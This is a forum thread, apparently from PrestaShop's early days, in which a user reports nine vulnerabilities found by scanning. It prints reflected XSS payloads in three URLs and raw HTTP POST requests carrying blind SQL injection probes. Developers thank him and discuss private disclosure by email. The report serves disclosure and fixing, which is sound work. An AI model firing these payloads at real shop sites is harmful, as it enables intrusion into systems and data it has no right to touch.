9 security issues discovered

[tijuan]

Found this application nice for my needs but after a scan on the frontend, I discovered 9 security holes

 

---------------------------------------------------

 

3 XSS

- /prestashop/search.php/>"><ScRiPt>alert(1284656107)</ScRiPt>

- /prestashop/order.php/>"><ScRiPt>alert(1847082919)</ScRiPt>

- /prestashop/index.php/>"><ScRiPt>alert(1868783360)</ScRiPt>

 

 

 

 

---------------------------------------------------

6 Blind SQL/XPATH injection (string inputs et numeric inputs)

 

 

- /prestashop/delivery.php

 

 

 

POST /TESTS/prestashop/prestashop/delivery.php HTTP/1.0

Accept: */*

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

Host: localhost

Content-Length: 27

Cookie: 2467f97bc4de890653b11ffaf96f091d=HKqwH3T6lgo%3Dapk3T2Ho0LI%3DfZe%2FYlmr7LQ%3DlXqZZx2iFeE%3Dzz7%2FXIVLDtk%3DX54uXNGGQw4%3DYb4oDR0YLso%3DMlxZfZTCSgo%3DH%2Bk8E7Uplmk%3DEMDKE7P03Uc%3DtSn1JzkLvcw%3D;=httponly

Connection: Close

Pragma: no-cache

 

id_currency=1'+and+'1'%3D'0

 

---------------------------------------------------

 

- /prestashop/modules/cheque/payment.php

(same header)

 

---------------------------------------------------

 

- /prestashop/history.php

POST /TESTS/prestashop/prestashop/history.php HTTP/1.0

Accept: */*

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

Host: localhost

Content-Length: 23

Cookie: 2467f97bc4de890653b11ffaf96f091d=HKqwH3T6lgo%3Dapk3T2Ho0LI%3DfZe%2FYlmr7LQ%3DlXqZZx2iFeE%3Dzz7%2FXIVLDtk%3DX54uXNGGQw4%3DYb4oDR0YLso%3DMlxZfZTCSgo%3DH%2Bk8E7Uplmk%3DEMDKE7P03Uc%3DtSn1JzkLvcw%3D;=httponly

Connection: Close

Pragma: no-cache

 

id_currency=1+and+1%3D0

 

---------------------------------------------------

 

- /prestashop/modules/cheque/payment.php

(same header)

 

---------------------------------------------------

 

- /prestashop/contact-form.php

 

POST /TESTS/prestashop/prestashop/contact-form.php HTTP/1.0

Accept: */*

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

Host: localhost

Content-Length: 132

Cookie: 2467f97bc4de890653b11ffaf96f091d=HKqwH3T6lgo%3Dapk3T2Ho0LI%3DfZe%2FYlmr7LQ%3DlXqZZx2iFeE%3Dzz7%2FXIVLDtk%3DX54uXNGGQw4%3DYb4oDR0YLso%3DMlxZfZTCSgo%3DH%2Bk8E7Uplmk%3DEMDKE7P03Uc%3DtSn1JzkLvcw%3D;=httponly

Connection: Close

Pragma: no-cache

 

id_contact=0&[email protected]"+and+"1"%3D"0&[email protected]&submitMessage=%E5%8F%91%E9%80%81

 

---------------------------------------------------

 

/prestashop/history.php

 

POST /TESTS/prestashop/prestashop/history.php HTTP/1.0

Accept: */*

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

Host: localhost

Content-Length: 27

Cookie: 2467f97bc4de890653b11ffaf96f091d=HKqwH3T6lgo%3Dapk3T2Ho0LI%3DfZe%2FYlmr7LQ%3DlXqZZx2iFeE%3Dzz7%2FXIVLDtk%3DX54uXNGGQw4%3DYb4oDR0YLso%3DMlxZfZTCSgo%3DH%2Bk8E7Uplmk%3DEMDKE7P03Uc%3DtSn1JzkLvcw%3D;=httponly

Connection: Close

Pragma: no-cache

 

id_currency=1"+and+"1"%3D"0

 

 

 

All these security issues come from bad input filtering of course.

Good Luck.

[Bruno Leveque]

Hi tijuan !

 

Thanks for your work! These security holes will be fixed before 0.8.9 release of course 

 

We are searching for people like you, do not hesitate to contact us directly for testing purposes.

 

Best regards,

Bruno Lévêque

[Peter Wilson]

Excellent job, tijuan.

 

You have done us and all PrestaShop users a huge favor by reporting these issues.

 

PrestaShop makes security a top priority.  To all of our users, we ask that you please report any and all security issues as soon as they are discovered, either by posting in this forum or by e-mailing us at [email protected].

 

[James]

When version one is released, I don't think reporting security holes on a public forum will be a good idea. Granted they need reporting, but maybe in a discreet mannor

[Peter Wilson]

Good point, James.  While we don't want to shut off any method of communication entirely, after v1.0 we should probably emphasize the use of the [email protected] e-mail address while placing revealing forum posts in quarantine until we release a fixed update of the software.

 

Just FYI, fixing these security holes have delayed release of v0.8.9 by a few hours.  Thank you or your patience.

[tijuan]

Actually, i did not see this email adress, and as I said to Bruno on the phone today, I saw this forum category and thought that was the right place for this alert.

But i'll sure use the email next time if there should be a next time.

 

I'm glad I could help.

 

[Peter Wilson]

Hi tijuan,

 

The reason you didn't see that e-mail address ([email protected]) is simple: We hadn't published it anywhere yet.  In fact, we created it after your post. So you did the right thing by posting your security issues here. ;D

 

Pointing out flaws in our security, delaying our next release, making us create new e-mail addresses ... who invited you here, anyway? 

 

But seriously, please feel free to contribute again.

[tijuan]

My bad

 

Of course i'll help if I see something else.